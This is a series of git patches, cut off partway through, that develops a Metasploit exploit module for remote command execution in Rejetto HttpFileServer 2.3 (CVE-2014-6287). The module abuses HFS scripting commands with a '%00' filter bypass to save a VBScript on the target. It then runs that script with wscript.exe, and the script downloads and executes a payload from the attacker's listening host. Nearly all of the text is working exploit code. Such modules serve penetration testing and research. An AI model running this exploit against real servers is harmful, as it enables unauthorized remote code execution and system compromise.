From 8b4b66fcaa7ec37c2e8dec81464ffa7a3f252e73 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sun, 14 Sep 2014 12:26:02 +0800 Subject: [PATCH 01/16] initial test --- .../windows/http/http_file_server_exec.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/exploits/windows/http/http_file_server_exec.rb diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb new file mode 100644 index 0000000000..a816372efb --- /dev/null +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "HttpClient and HttpServer Example", + 'Description' => %q{ + This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time, + but this allows the HttpServer to terminate after a delay. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'mfadzilr' ], + 'References' => + [ + ['URL', 'http://metasploit.com'] + ], + 'Payload' => { 'BadChars' => "\x00" }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', {} ], + ], + 'CmdStagerFlavor' => 'vbs' + 'Privileged' => false, + 'DisclosureDate' => "Sep 14 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to some web application', '/']), + OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) + ], self.class) + end + + def on_request_uri(cli, req) + print_status("#{peer} - Payload request received: #{req.uri}") + exe = generate_payload_exe + send_response(cli, exe, 'You get this, I own you') + end + + def primer + uri = target_uri.path + fname = "evil.vbs" + save_path = "c:\\" + fname + vbs_evil = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0ax.Open \x22GET\x22,\x22http://#{RHOST}/#{fname}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + exec_save = "%00{.save|save_path|#{vbs_evil}.}" + print_status("Sending a malicious request to #{target_uri.path}") + #send_request_cgi({'uri'=>normalize_uri(target_uri.path)}) + send_request_cgi({ + 'method' => 'GET', + 'uri' => 'normalize_uri(uri,'?search=' + exec_save), + }) + end + + def exploit + begin + Timeout.timeout(datastore['HTTPDELAY']) { super } + rescue Timeout::Error + # When the server stops due to our timeout, this is raised + end + end +end From 74ef83812aaa7d30ef8211972136d2fa64c3099f Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 01:43:18 +0800 Subject: [PATCH 02/16] update module vulnerability information --- .../windows/http/http_file_server_exec.rb | 61 ++++++++++++------- 1 file changed, 38 insertions(+), 23 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index a816372efb..f7296bee83 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -6,61 +6,76 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Reank = NormalRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer::HTML - include Msf::Exploit::FileDropper + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + #include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, - 'Name' => "HttpClient and HttpServer Example", + 'Name' => "HttpFileServer 2.3.x Remote Command Execution", 'Description' => %q{ - This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time, - but this allows the HttpServer to terminate after a delay. + HFS is vulnerable to remote command execution attack due to a poor regex in the file + ParserLib.pas. This module exploit the HFS scripting command by using '%00' to bypass + the filtering. }, 'License' => MSF_LICENSE, - 'Author' => [ 'mfadzilr' ], + 'Author' => + [ + 'Daniele Linguaglossa ', # orginal p.o.c + 'Muhamad Fadzil Ramli ' # metasploit module + ], 'References' => [ - ['URL', 'http://metasploit.com'] + ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], + ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], ], - 'Payload' => { 'BadChars' => "\x00" }, + 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], ], - 'CmdStagerFlavor' => 'vbs' + #'CmdStagerFlavor' => 'vbs', 'Privileged' => false, 'DisclosureDate' => "Sep 14 2014", 'DefaultTarget' => 0)) register_options( [ - OptString.new('TARGETURI', [true, 'The path to some web application', '/']), - OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) + OptString.new('TARGETURI', [true, 'The path of the web application', '/']), + OptString.new('SAVE_PATH', [true, 'Location where the vbs script will be executed', 'c:\\']), + OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), ], self.class) end def on_request_uri(cli, req) print_status("#{peer} - Payload request received: #{req.uri}") exe = generate_payload_exe - send_response(cli, exe, 'You get this, I own you') + vbs = Msf::Util::EXE.to_exe_vbs(exe) + send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) end def primer - uri = target_uri.path - fname = "evil.vbs" - save_path = "c:\\" + fname - vbs_evil = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0ax.Open \x22GET\x22,\x22http://#{RHOST}/#{fname}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" - exec_save = "%00{.save|save_path|#{vbs_evil}.}" + + file_name = rand_text_alpha(rand(10)+5) + file_ext = '.vbs' + file_fullname = file_name + file_ext + + vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0aif err.number <> 0 then wsh.exit\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + + payload = "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}" + payload = URI::encode(payload) + + exec_cmd = "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + exec_cmd = URI::encode(exec_cmd) + print_status("Sending a malicious request to #{target_uri.path}") - #send_request_cgi({'uri'=>normalize_uri(target_uri.path)}) - send_request_cgi({ - 'method' => 'GET', - 'uri' => 'normalize_uri(uri,'?search=' + exec_save), - }) + Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{payload}.}") + Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{exec_cmd}.}") + end def exploit From f1d3c44f4f78d070777e36e3b6b0947e0cc6e085 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 12:59:27 +0800 Subject: [PATCH 03/16] exploit module for HTTP File Server version 2.3b, exploiting HFS scripting commands 'save' and 'exec'. --- .../windows/http/http_file_server_exec.rb | 45 ++++++++++++------- 1 file changed, 30 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index f7296bee83..580065110b 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -11,34 +11,34 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer - #include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "HttpFileServer 2.3.x Remote Command Execution", 'Description' => %q{ HFS is vulnerable to remote command execution attack due to a poor regex in the file - ParserLib.pas. This module exploit the HFS scripting command by using '%00' to bypass + ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass the filtering. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Daniele Linguaglossa ', # orginal p.o.c + 'Daniele Linguaglossa ', # orginal discovery 'Muhamad Fadzil Ramli ' # metasploit module ], 'References' => [ ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], + ['CVE', 'CVE-2014-6287'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, + # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], ], - #'CmdStagerFlavor' => 'vbs', 'Privileged' => false, 'DisclosureDate' => "Sep 14 2014", 'DefaultTarget' => 0)) @@ -46,36 +46,51 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ OptString.new('TARGETURI', [true, 'The path of the web application', '/']), - OptString.new('SAVE_PATH', [true, 'Location where the vbs script will be executed', 'c:\\']), + OptString.new('SAVE_PATH', [true, 'Target writable path', 'c:\\']), OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), ], self.class) end + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/' + }) + + if res.headers['Server'] =~ /HFS 2.3/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + def on_request_uri(cli, req) print_status("#{peer} - Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) + remove_resource(get_resource) # remove resource after serving 1st reequest. end def primer - file_name = rand_text_alpha(rand(10)+5) file_ext = '.vbs' file_fullname = file_name + file_ext - vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0aif err.number <> 0 then wsh.exit\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" - payload = "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}" - payload = URI::encode(payload) - - exec_cmd = "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" - exec_cmd = URI::encode(exec_cmd) + payloads = [ + "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", + "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + ] print_status("Sending a malicious request to #{target_uri.path}") - Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{payload}.}") - Net::HTTP.get(datastore['RHOST'],"/?search=%00{.#{exec_cmd}.}") - + payloads.each { |payload| + send_request_raw({ + 'method' => 'GET', + 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" + }) + } end def exploit From 9860ed340efa3ecb2998da8d42cb5c49f51a70e8 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 13:13:25 +0800 Subject: [PATCH 04/16] run msftidy, make correction for CVE format and space at EOL (line 77) --- modules/exploits/windows/http/http_file_server_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 580065110b..bd893034dc 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote [ ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], - ['CVE', 'CVE-2014-6287'], + ['CVE', '2014-6287'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote def primer file_name = rand_text_alpha(rand(10)+5) - file_ext = '.vbs' + file_ext = '.vbs' file_fullname = file_name + file_ext vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" From 783b03efb62198a7882a2bad92e2878c92ec661a Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Mon, 15 Sep 2014 17:21:05 +0800 Subject: [PATCH 05/16] change line 84 as mubix advice, update disclosure date according to bugtraq security list. --- modules/exploits/windows/http/http_file_server_exec.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index bd893034dc..874a33a816 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Automatic', {} ], ], 'Privileged' => false, - 'DisclosureDate' => "Sep 14 2014", + 'DisclosureDate' => "Sep 11 2014", 'DefaultTarget' => 0)) register_options( @@ -81,7 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote payloads = [ "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", - "exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" + "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" ] print_status("Sending a malicious request to #{target_uri.path}") From 978803e9d80915fcf9b94ae9cab3982fc38acbd3 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Tue, 16 Sep 2014 21:49:02 +0800 Subject: [PATCH 06/16] add proper regex --- modules/exploits/windows/http/http_file_server_exec.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 874a33a816..5681858572 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res.headers['Server'] =~ /HFS 2.3/ + if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote payloads = [ "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" - "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" + "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix ] print_status("Sending a malicious request to #{target_uri.path}") From 677d035ce8c248506c76815fb4135c76a7a2d27d Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Fri, 19 Sep 2014 11:30:51 +0800 Subject: [PATCH 07/16] added proper regex for check function add comment for changed code --- .../windows/http/http_file_server_exec.rb | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 5681858572..f123d51d08 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -57,7 +57,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res.headers['Server'] =~ /HFS 2\.3/ # added proper regex + if res.headers['Server'] =~ /HFS 2\.3/ + # added proper regex as pointed by wchen return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -69,7 +70,9 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) - remove_resource(get_resource) # remove resource after serving 1st reequest. + # remove resource after serving 1st request as 'exec' execute 4x + # during exploitation + remove_resource(get_resource) end def primer @@ -77,12 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote file_ext = '.vbs' file_fullname = file_name + file_ext - vbs_code = "Set x=CreateObject(\x22Microsoft.XMLHTTP\x22)\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \x22GET\x22,\x22http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\x22,False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" payloads = [ "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", - #"exec|cmd /q /c start #{datastore['SAVE_PATH']}#{file_name}" - "exec|wscript.exe #{datastore['SAVE_PATH']}#{file_fullname}" # using wscript instead of cmd.exe, thanks mubix + "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}", + # using wscript.exe instead of cmd.exe, thank mubix + "delete|#{datastore['SAVE_PATH']}#{file_fullname}" + # delete vbs file after execution ] print_status("Sending a malicious request to #{target_uri.path}") From 19ed594e9839b4fa9a150d9ef9a9373cea45c44a Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sat, 20 Sep 2014 10:52:21 +0800 Subject: [PATCH 08/16] using FileDropper method for cleanup --- modules/exploits/windows/http/http_file_server_exec.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index f123d51d08..5e4a2f71a8 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, @@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}", # using wscript.exe instead of cmd.exe, thank mubix - "delete|#{datastore['SAVE_PATH']}#{file_fullname}" + #"delete|#{datastore['SAVE_PATH']}#{file_fullname}" # delete vbs file after execution ] @@ -97,6 +98,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" }) } + register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}") + # use FileDropper method for cleanup end def exploit From dd71c666dc43c9d0d01fd45e2609a89e3fe16524 Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sat, 20 Sep 2014 15:31:28 +0800 Subject: [PATCH 09/16] added osvdb reference and software download url, use FileDropper method for cleanup --- modules/exploits/windows/http/http_file_server_exec.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 5e4a2f71a8..277de707c2 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -9,8 +9,8 @@ class Metasploit3 < Msf::Exploit::Remote Reank = NormalRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) @@ -30,8 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], + ['URL', 'http://www.rejetto.com/hfs/download'], ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], ['CVE', '2014-6287'], + ['OSVDB', '111386'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] From a2a2ca550e3f22f42bb52569b5cd1cc87dcf5f9e Mon Sep 17 00:00:00 2001 From: mfadzilr Date: Sat, 20 Sep 2014 20:06:30 +0800 Subject: [PATCH 10/16] add test result on different windows version --- modules/exploits/windows/http/http_file_server_exec.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 277de707c2..ffef4a75bb 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -36,7 +36,10 @@ class Metasploit3 < Msf::Exploit::Remote ['OSVDB', '111386'], ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, - # Tested HFS 2.3b on Microsoft Windows XP [Version 5.1.2600] + # Tested HFS 2.3b : + # - Windows XP (Build 2600, Service Pack 3). + # - Windows 7 (Build 7601, Service Pack 1). + # - Windows 8 (Build 9200). 'Platform' => 'win', 'Targets' => [ @@ -73,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) + remove_resource(get_resource) # remove resource after serving 1st request as 'exec' execute 4x # during exploitation - remove_resource(get_resource) end def primer From d913bf1c35efc37afa519bc01920cbfd07d5a6e8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 10:29:59 -0500 Subject: [PATCH 11/16] Fix metadata --- .../windows/http/http_file_server_exec.rb | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index ffef4a75bb..8928e22086 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -15,11 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "HttpFileServer 2.3.x Remote Command Execution", + 'Name' => "HttpFileServer Remote Command Execution", 'Description' => %q{ - HFS is vulnerable to remote command execution attack due to a poor regex in the file - ParserLib.pas. This module exploit the HFS scripting commands by using '%00' to bypass - the filtering. + HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex + in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' + to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows + XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -29,17 +30,12 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ - ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], - ['URL', 'http://www.rejetto.com/hfs/download'], - ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'], ['CVE', '2014-6287'], ['OSVDB', '111386'], + ['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], + ['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'] ], 'Payload' => { 'BadChars' => "\x0d\x0a\x00" }, - # Tested HFS 2.3b : - # - Windows XP (Build 2600, Service Pack 3). - # - Windows 7 (Build 7601, Service Pack 1). - # - Windows 8 (Build 9200). 'Platform' => 'win', 'Targets' => [ From d02f0dc4b9776ca0b7e175d5af969e3759782b5d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 10:36:56 -0500 Subject: [PATCH 12/16] Make minor cleanup --- .../windows/http/http_file_server_exec.rb | 42 ++++++++++--------- 1 file changed, 22 insertions(+), 20 deletions(-) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index 8928e22086..f1f3454bec 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Reank = NormalRanking + Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer @@ -15,12 +15,12 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info={}) super(update_info(info, - 'Name' => "HttpFileServer Remote Command Execution", + 'Name' => "Rejetto HttpFileServer Remote Command Execution", 'Description' => %q{ - HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex - in the file ParserLib.pas. This module exploit the HFS scripting commands by using '%00' - to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows - XP SP3, Windows 7 SP1 and Windows 8. + Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a + poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by + using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b + over Windows XP SP3, Windows 7 SP1 and Windows 8. }, 'License' => MSF_LICENSE, 'Author' => @@ -59,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => '/' }) - if res.headers['Server'] =~ /HFS 2\.3/ - # added proper regex as pointed by wchen + if res && res.headers['Server'] && res.headers['Server'] =~ /HFS 2\.3/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -72,35 +71,38 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) - remove_resource(get_resource) # remove resource after serving 1st request as 'exec' execute 4x # during exploitation + remove_resource(get_resource) end def primer file_name = rand_text_alpha(rand(10)+5) file_ext = '.vbs' - file_fullname = file_name + file_ext + file_full_name = file_name + file_ext - vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0aOn Error Resume Next\x0d\x0ax.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0aIf Err.Number <> 0 Then\x0d\x0awsh.exit\x0d\x0aEnd If\x0d\x0ax.Send\x0d\x0aExecute x.responseText" + vbs_code = "Set x=CreateObject(\"Microsoft.XMLHTTP\")\x0d\x0a" + vbs_code << "On Error Resume Next\x0d\x0a" + vbs_code << "x.Open \"GET\",\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\",False\x0d\x0a" + vbs_code << "If Err.Number <> 0 Then\x0d\x0a" + vbs_code << "wsh.exit\x0d\x0a" + vbs_code << "End If\x0d\x0a" + vbs_code << "x.Send\x0d\x0a" + vbs_code << "Execute x.responseText" payloads = [ - "save|#{datastore['SAVE_PATH']}#{file_fullname}|#{vbs_code}", - "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_fullname}", - # using wscript.exe instead of cmd.exe, thank mubix - #"delete|#{datastore['SAVE_PATH']}#{file_fullname}" - # delete vbs file after execution + "save|#{datastore['SAVE_PATH']}#{file_full_name}|#{vbs_code}", + "exec|wscript.exe //B //NOLOGO #{datastore['SAVE_PATH']}#{file_full_name}" ] print_status("Sending a malicious request to #{target_uri.path}") - payloads.each { |payload| + payloads.each do |payload| send_request_raw({ 'method' => 'GET', 'uri' => "/?search=%00{.#{URI::encode(payload)}.}" }) - } - register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_fullname}") - # use FileDropper method for cleanup + end + register_file_for_cleanup("#{datastore['SAVE_PATH']}#{file_full_name}") end def exploit From 909f88680b03448c99ce90b048f4eda674ab6c06 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 11:08:01 -0500 Subject: [PATCH 13/16] Make exploit aggressive --- modules/exploits/windows/http/http_file_server_exec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/http_file_server_exec.rb index f1f3454bec..8b27856801 100644 --- a/modules/exploits/windows/http/http_file_server_exec.rb +++ b/modules/exploits/windows/http/http_file_server_exec.rb @@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Automatic', {} ], ], 'Privileged' => false, + 'Stance' => Msf::Exploit::Stance::Aggressive, 'DisclosureDate' => "Sep 11 2014", 'DefaultTarget' => 0)) From 25344aeb6ab25c387dbeea5d7bd957f0c982a178 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 2014 11:55:33 -0500 Subject: [PATCH 14/16] Change filename --- .../http/{http_file_server_exec.rb => rejetto_hfs_exec.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/http/{http_file_server_exec.rb => rejetto_hfs_exec.rb} (100%) diff --git a/modules/exploits/windows/http/http_file_server_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb similarity index 100% rename from modules/exploits/windows/http/http_file_server_exec.rb rename to modules/exploits/windows/http/rejetto_hfs_exec.rb From d90fe4f724c1309b8cf32cdb89f348021a76b3fc Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 8 Oct 